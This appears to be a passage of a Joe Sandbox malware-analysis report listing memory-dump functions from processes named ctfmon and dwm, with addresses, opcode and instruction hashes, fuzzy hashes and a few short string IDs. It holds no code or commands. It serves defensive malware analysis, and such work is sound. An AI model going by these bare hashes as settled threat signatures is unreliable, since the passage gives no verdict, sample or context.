                                                              • Opcode Fuzzy Hash: e4233d5116f3023a5cbcaad72285692031cc97edc8e70479d8cc548bf707d2ee
                                                              • Instruction Fuzzy Hash: F7F06D31B09A1E4EEB94EA9C54AA7FC77D1EF98212F440176E41DC32A3CE2869854B91
                                                              Function 00007FFD9B784CD0 Relevance: .0, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 775f389685e86093e890a0d42bf344c6183ae16eae305fb97188253a588cc764
                                                              • Instruction ID: da51c9fa52b7cef639a1733a7d3759ea6381a400f3ef9667fa2d7d180bcb1368
                                                              • Opcode Fuzzy Hash: 775f389685e86093e890a0d42bf344c6183ae16eae305fb97188253a588cc764
                                                              • Instruction Fuzzy Hash: BE011E60E19F1D4EE7B5A65888B47B971D1AF48702F4202B9E45EE32B2DF786E404600
                                                              Function 00007FFD9B7B7A3D Relevance: .0, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: daee2fa1a6e6264072c4ac78d0d566bb33050aa9f935d31f1b122265433fbf64
                                                              • Instruction ID: 71756f43975670f075d0df9702dd65893daffc051f65922f9c9bda5bb278888f
                                                              • Opcode Fuzzy Hash: daee2fa1a6e6264072c4ac78d0d566bb33050aa9f935d31f1b122265433fbf64
                                                              • Instruction Fuzzy Hash: FEF06922A0E7C55FD31A073888754687F71AE6722530B01E7C095CF0F3D9299D8AC762
                                                              Function 00007FFD9B784D19 Relevance: .0, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 82a5860a0b7a321af4d36804a7609a158e09df83ae2663a99a4a2c573a75a3d2
                                                              • Instruction ID: 01faf4bb102ef15a40fe28a017c915bb05845bdf3bd224aa624573ac65a7f278
                                                              • Opcode Fuzzy Hash: 82a5860a0b7a321af4d36804a7609a158e09df83ae2663a99a4a2c573a75a3d2
                                                              • Instruction Fuzzy Hash: 2E011230A19B1E8EEB38EA54D8A47F532A1FF54702F1111BDD40ED31B2EA7C2B818A00
                                                              Function 00007FFD9B784DA0 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f213c50215499450995a76fd97423c786ea4869def82481ed996932733a1a6a1
                                                              • Instruction ID: 4b6a06b41acc23438f7dcebd3c21f45e4ab54e5599ee749a45f6da057d38525a
                                                              • Opcode Fuzzy Hash: f213c50215499450995a76fd97423c786ea4869def82481ed996932733a1a6a1
                                                              • Instruction Fuzzy Hash: E9F03630709B1D4AE674EB44E8B4AB53391AF54701F1212B9D90ED71F3EE7C6B454504
                                                              Function 00007FFD9B7854BD Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 22f0f614b482e578ef3f182d912a34d9961161de6b3de36afe9a193c8084e9fd
                                                              • Instruction ID: 870788c67c91c2a07ef1b711aaefe1768f338845f11040a7cce6d1a86680f5f3
                                                              • Opcode Fuzzy Hash: 22f0f614b482e578ef3f182d912a34d9961161de6b3de36afe9a193c8084e9fd
                                                              • Instruction Fuzzy Hash: 75F02131E15E5A4BE3155B1488B50AC33A2FF40311F5543B0DC1E4B3F6EF291E0286C1
                                                              Function 00007FFD9B7BAB09 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 02ef73dc90ffce9414ea8ab63213b3e8cc379f0c2466559ca730fd2c5fbc9bec
                                                              • Instruction ID: e84fcae9ad6c2e70ddba8a3231400df3fdd00eb8499688afd1799b603f63d25c
                                                              • Opcode Fuzzy Hash: 02ef73dc90ffce9414ea8ab63213b3e8cc379f0c2466559ca730fd2c5fbc9bec
                                                              • Instruction Fuzzy Hash: B2F0E530B587880FC7199A2958654617BF1DF5B20534A42FFD49ACB2A3DD28AC458741
                                                              Function 00007FFD9B794935 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b790000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8131b47b867fc6b529868362e4b1c81cc5b27f3f3f8f66b61e33cd7e4fe003e0
                                                              • Instruction ID: b9e38a45d214338207375f53aaff6657e60c872d555f0b4c04b9511e9fa82ff3
                                                              • Opcode Fuzzy Hash: 8131b47b867fc6b529868362e4b1c81cc5b27f3f3f8f66b61e33cd7e4fe003e0
                                                              • Instruction Fuzzy Hash: ADF08935B0EB5F4BE635DA9898605BA7364EF05340B134379D41AD32F6DF38EA018680
                                                              Function 00007FFD9B7B1D49 Relevance: .0, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c421ea41a7e7ff8a7e86527cfb9b4aa6c766f339f38d6ae638c6ffca413eee46
                                                              • Instruction ID: ed2c4dbbe90490d199d0fc8ea0ed0570fdc47263a940487e524eb35db3123ffd
                                                              • Opcode Fuzzy Hash: c421ea41a7e7ff8a7e86527cfb9b4aa6c766f339f38d6ae638c6ffca413eee46
                                                              • Instruction Fuzzy Hash: 6BE09230B1A7C44FCB0AAA3888684607BB1EF6720278952FFC445CB2E3D928DC89C741
                                                              Function 00007FFD9B7B8299 Relevance: .0, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba1832d6a42cc2a2324e29a5eb271fdb7fb24af124e03169fdc2222386593029
                                                              • Instruction ID: 418bc479a2730b1b89f34b398ef291d3a93538327c482a4cecd08725bfa39a09
                                                              • Opcode Fuzzy Hash: ba1832d6a42cc2a2324e29a5eb271fdb7fb24af124e03169fdc2222386593029
                                                              • Instruction Fuzzy Hash: 82E04F30A197844FCB0A9B2888699503BB0EF6B21178A40EBC049CF1F3E629DC48C752
                                                              Function 00007FFD9B784B77 Relevance: .0, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6a1b2f102a6176cb28416137329539e1ae1a6454c59c76c1dfc2125f6e29a98f
                                                              • Instruction ID: 8ff9a74c172d593a99d19d8d17c87831a92da2d8bf39a88eb2c060635687cbe1
                                                              • Opcode Fuzzy Hash: 6a1b2f102a6176cb28416137329539e1ae1a6454c59c76c1dfc2125f6e29a98f
                                                              • Instruction Fuzzy Hash: 38E0D863F0DE0D0EF2A4D55804B43B825C1DF58762F0603BAD00EC22B2FD281D414241
                                                              Function 00007FFD9B7BD7E9 Relevance: .0, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bd23af48d80b9028cff80ca5e6856a8360942cf9daddfa76dd6e14908e1984cb
                                                              • Instruction ID: fdef9bf5e5cd33f083a5d342d4c5a74af720a8d6a8f45fec749f27a802b7c12e
                                                              • Opcode Fuzzy Hash: bd23af48d80b9028cff80ca5e6856a8360942cf9daddfa76dd6e14908e1984cb
                                                              • Instruction Fuzzy Hash: AAE08631A497804FC7095B2888A98543BB0DF6711278A40FBC005CF2B3D62DDC89C711
                                                              Function 00007FFD9B795380 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b790000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ace303399836f14eb33aaf010cbd8b6679ae566b1ad7189f9ccf16d6c4b789ca
                                                              • Instruction ID: b61c8b3a24e5e9fe93ea92e9a5c6236a7505e948a5b4c10c68850a5d05c6efb2
                                                              • Opcode Fuzzy Hash: ace303399836f14eb33aaf010cbd8b6679ae566b1ad7189f9ccf16d6c4b789ca
                                                              • Instruction Fuzzy Hash: 6DD05E30B60A0D4B8B4CA62D8458430B3D2E7AA2067D45278940BC6295ED25ECC68B80
                                                              Function 00007FFD9B783276 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d59f36901ba77a1d5173b1770939f6bebda0635c63cd8e0b3e37dab8a24d587
                                                              • Instruction ID: 4b7b4d292ed0ec8a4721965bc28670ff99bf46d5edff54a11296b8e382a75cb2
                                                              • Opcode Fuzzy Hash: 2d59f36901ba77a1d5173b1770939f6bebda0635c63cd8e0b3e37dab8a24d587
                                                              • Instruction Fuzzy Hash: D5E01230F0DA1E46FBA49144C8A07E97394EF94312F1601B8D58EA33E1DD38AFC48A45
                                                              Function 00007FFD9B7BA670 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                              Function 00007FFD9B7BA5E0 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                              Function 00007FFD9B793BD0 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b790000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                              • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                              • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                              • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                              Function 00007FFD9B7B9059 Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: df427db11c4b8b1adbad613056556dcb95fb70cc3927cb4c4236a00b99d5bef6
                                                              • Instruction ID: 9092713a171e2d5dad25970d90dfa1a4dd6ca75999bd10eba25e6c1d4413d71b
                                                              • Opcode Fuzzy Hash: df427db11c4b8b1adbad613056556dcb95fb70cc3927cb4c4236a00b99d5bef6
                                                              • Instruction Fuzzy Hash: C8E0173150A7884FCB0BAB348CA99803FB0EE6B21178B01C7D045CF5B3EA598D89C762
                                                              Function 00007FFD9B7B7A09 Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8cc84ed8f1dfa8a68fc1917448678c270b1a1f028bc4073e877321ca715a2d44
                                                              • Instruction ID: d23d908daa4caa6190485d6fb195fe7573d829f4088949ca24af75020e520b84
                                                              • Opcode Fuzzy Hash: 8cc84ed8f1dfa8a68fc1917448678c270b1a1f028bc4073e877321ca715a2d44
                                                              • Instruction Fuzzy Hash: 9AE04F31A4F7C04FC74B973488788507FA1DE5721074A45EEC085CF5B3D6198D49C701
                                                              Function 00007FFD9B7BD869 Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc0893e6972b1db24272a6556afb45700994b964ecba2b9cc7463da4df9d0a74
                                                              • Instruction ID: bf4e0e619de8f275e65c4db50b820028ece5d949631a47f6ca0e263d6d0719b4
                                                              • Opcode Fuzzy Hash: dc0893e6972b1db24272a6556afb45700994b964ecba2b9cc7463da4df9d0a74
                                                              • Instruction Fuzzy Hash: 50E04F6194F7C04FC70B9B3588B88407F60EE2721178A45EEC085CF1B3E6198C49C701
                                                              Function 00007FFD9B7BCF79 Relevance: .0, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 70e04e2a095345de69a44cc4f4a7a3ebee4407e6c86ec40a26d25b3b58c45cbd
                                                              • Instruction ID: 226f5cdc0ad8bc2c5e4dff0f02c3e0c1f604d46dfeb201affb1b12e14cf5709f
                                                              • Opcode Fuzzy Hash: 70e04e2a095345de69a44cc4f4a7a3ebee4407e6c86ec40a26d25b3b58c45cbd
                                                              • Instruction Fuzzy Hash: B7E0EC3150A7844FC70A9B2488A99943FB0EF2621178A01EBC449CF5B3D6299888CB52
                                                              Function 00007FFD9B7B1DF0 Relevance: .0, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                              • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                              • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                              • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                              Function 00007FFD9B7BB958 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cbfe45211ad73ac3c17ab894c132553cfacac7f021d9affde010218669dfca01
                                                              • Instruction ID: 70612281d9585890a6d6f4cf59acf35b8267b14e10d1c9ea082ef5e7cea4887d
                                                              • Opcode Fuzzy Hash: cbfe45211ad73ac3c17ab894c132553cfacac7f021d9affde010218669dfca01
                                                              • Instruction Fuzzy Hash: E9D01234B519044FC71CA63C886987473D1EB6A217B9541B9D00AD72B1D96ADD89CB41
                                                              Function 00007FFD9B7B7070 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7479cc42ffc60ba2653225b21c49bf0392be7e12deb69c3dfb1531d468da8461
                                                              • Instruction ID: 7d5a485abe3f1a101fe236d7c12fdd607988a3ec4558fc01dadeabbbd6232ba3
                                                              • Opcode Fuzzy Hash: 7479cc42ffc60ba2653225b21c49bf0392be7e12deb69c3dfb1531d468da8461
                                                              • Instruction Fuzzy Hash: 6BD02230B649040FC70CAA3C88588307390EB6A20278100A8D00BD72B1E92ADD88CB40
                                                              Function 00007FFD9B780B9D Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba44e30b299232d18dd58396ab05012bbb058ffb7b5d4e444c28c93c79ff008a
                                                              • Instruction ID: 2a1721bd37c2c0e229c6edeb69d2e9e63533fe1581581a77562d8443ec22fc0d
                                                              • Opcode Fuzzy Hash: ba44e30b299232d18dd58396ab05012bbb058ffb7b5d4e444c28c93c79ff008a
                                                              • Instruction Fuzzy Hash: E7C0123062990E8FDA40BB28C8C9824BBA0FB0E202BDA01E4E00CC71B1D629A8908700
                                                              Function 00007FFD9B7B2608 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b13688833a01d731f3a2dedd5a3c717fe161ef50268dfdb8dc8fc84a6ebbec9
                                                              • Instruction ID: d747e547a66aebc92c587616af35a20cd085c957edf79648b75eb635ad53b46a
                                                              • Opcode Fuzzy Hash: 2b13688833a01d731f3a2dedd5a3c717fe161ef50268dfdb8dc8fc84a6ebbec9
                                                              • Instruction Fuzzy Hash: E5D02E30F0E7AA4AE364E6848871BA83280AF00300F0001B4E00C836E3C8083C408E82
                                                              Function 00007FFD9B7806AD Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a8057b2a2e29e7e3848875d95335190a1301d675519968e9b42c91e4c58ee40f
                                                              • Instruction ID: faff3e12c8c9fe63c49ea462aac9b206cb8c5b8a4464a0f790921376c9a1d048
                                                              • Opcode Fuzzy Hash: a8057b2a2e29e7e3848875d95335190a1301d675519968e9b42c91e4c58ee40f
                                                              • Instruction Fuzzy Hash: B7C04C05F5FF5F01E47531EE54E60ADB6409FC4A26FE31772D50D801B29C6E22D50196
                                                              Function 00007FFD9B7812B8 Relevance: .0, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3787d7a6cd85340d052397785a9d428e4e8ed80fe274377175b62aa4ea2664cd
                                                              • Instruction ID: 693aefd0555aa7c13d0ffe86cffec59e3527bad17fa240652fc2ed9797b61d88
                                                              • Opcode Fuzzy Hash: 3787d7a6cd85340d052397785a9d428e4e8ed80fe274377175b62aa4ea2664cd
                                                              • Instruction Fuzzy Hash: 5CC08C30611C0C8FC908EB28C88480433A0FB09201BC200A0E00AC7170D229DCC0C740
                                                              Function 00007FFD9B7806D0 Relevance: .0, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 807f6b4b69133c31bf548507f2ec2c4152f6a71d8028e8e319ca7a4a2011544e
                                                              • Instruction ID: 55681b21aa852a478038f68aa83c82495a066b141e3c6cd6be9a93864b0cfab4
                                                              • Opcode Fuzzy Hash: 807f6b4b69133c31bf548507f2ec2c4152f6a71d8028e8e319ca7a4a2011544e
                                                              • Instruction Fuzzy Hash: 9DB01200D5BD4F00E42431FB08D30647440AF84105FD30270E40C802B2986E12940282

                                                              Non-executed Functions

                                                              Function 00007FFD9B7809B0 Relevance: 5.2, Strings: 4, Instructions: 195COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: c9$!k9$"s9$#{9
                                                              • API String ID: 0-1692736845
                                                              • Opcode ID: be64be5333022bf308476621d778135d585de084caa77ddb1cf8954df1b0d530
                                                              • Instruction ID: a8db8b9a5516349690576d0cceb03b37db2f7a8324dbcda29aa8caba863ed978
                                                              • Opcode Fuzzy Hash: be64be5333022bf308476621d778135d585de084caa77ddb1cf8954df1b0d530
                                                              • Instruction Fuzzy Hash: EE51CE0BB8E52A49E31933FD75618FC6B458FA5335B0843B7F06E890DB8E18608186E5

                                                              Executed Functions

                                                              Function 00007FFD9B791175 Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: I
                                                              • API String ID: 0-3707901625
                                                              • Opcode ID: 2c9197ac4c996fcfb2fb1f281e94eb23203a70c0e9d68cba8efd3423c99c04d4
                                                              • Instruction ID: deded077fee64675daecbf8f65ee964828ae6cef5a1f1917a923f0b5a66ba912
                                                              • Opcode Fuzzy Hash: 2c9197ac4c996fcfb2fb1f281e94eb23203a70c0e9d68cba8efd3423c99c04d4
                                                              • Instruction Fuzzy Hash: 5C81CE21F5E38A0BE33C49688CA207577D1EBD6205B1A837DD8DBC35B7DC28B9174281
                                                              Function 00007FFD9B760D48 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
